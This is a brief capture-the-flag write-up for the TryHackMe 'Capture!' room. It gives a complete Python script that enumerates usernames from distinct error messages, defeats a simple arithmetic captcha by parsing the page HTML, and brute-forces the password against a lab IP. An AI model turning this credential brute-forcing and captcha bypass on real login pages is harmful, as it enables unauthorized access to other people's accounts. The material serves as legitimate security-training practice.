Capture!

https://tryhackme.com/room/capture

This room provide a nice coding challenge. After a couple of failed logins we are prompted with a home made Captcha.

I made a Python script to solve the challenge.

This script attempts to perform a brute force attack on the login page.

It uses Python's "requests" library to send HTTP requests to a website. Then reads a list of usernames and passwords from files, sets the target website's IP address, initializes a session, and defines functions to solve the Captcha and attempt a login with a given username and password.

It then brute forces the username and password by iterating through the lists of usernames and passwords and calling the relevant functions.

The code uses string manipulations to extract information from the response content of the login page.

Note that you could probably simplify the script e.g. by merging the two functions attempt_username(...) and attempt_password(...), but this does the trick.

import requests

# Load username and password lists from files
with open('usernames copy.txt', 'r') as f:
    usernames = f.read().splitlines()
with open('passwords copy.txt', 'r') as f:
    passwords = f.read().splitlines()

# Change this to the correct IP
IP = "10.10.10.10"

# Initialize session and captcha
session = requests.Session()
captcha = ('1', False)


def solve_captcha(response_content):
    # Find the Captcha
    start_index = response_content.find('<label for="usr"><b><h3>Captcha enabled</h3></b></label><br>') + len(
        '<label for="usr"><b><h3>Captcha enabled</h3></b></label><br>') + 5
    end_index = response_content.find('\n', start_index)
    line = response_content[start_index:end_index]

    tmp = line.split()
    a = tmp[0]
    b = tmp[2]
    opr = tmp[1]

    # Solve Capatcha
    if opr == "+":
        captcha = int(a) + int(b)
    elif opr == "-":
        captcha = int(a) - int(b)
    else:
        captcha = int(a) * int(b)

    return captcha


def attempt_username(username, password, captcha):
    url = f"http://{IP}/login"
    params = {'username': username,
              'password': password, 'captcha': captcha[0]}

    # Send the POST request and get the response content as a string
    response = session.post(url, data=params)
    response_content = response.text

    captcha = solve_captcha(response_content)

    if any(s in response_content for s in ("<p class=\"error\"><strong>Error:</strong> The user",
                                           "<p class=\"error\"><strong>Error:</strong> Invalid captcha")):
        return captcha, False
    else:
        return captcha, True


def attempt_password(username, password, captcha):
    url = f"http://{IP}/login"
    params = {'username': username,
              'password': password, 'captcha': captcha[0]}

    # Send the POST request and get the response content as a string
    response = session.post(url, data=params)
    response_content = response.text

    try:
        captcha = solve_captcha(response_content)
    except:
        captcha = ('1', False)

    if any(s in response_content for s in ("<p class=\"error\"><strong>Error:</strong> Invalid password for user",
                                           "<p class=\"error\"><strong>Error:</strong> Invalid captcha")):
        return captcha, False
    else:
        return captcha, True


# Brute force username
print("Attempting to brute force username...")
for username in usernames:
    captcha = attempt_username(username, "test", captcha)
    if captcha[1]:
        username = username
        print(f"Username found: {username}")
        break

# Brute force password
print(f"Attempting to brute force password for user \"{username}\"...")
for password in passwords:
    captcha = attempt_password(username, password, captcha)
    if captcha[1]:
        print(f"Password found: {password}")
        break

Last updated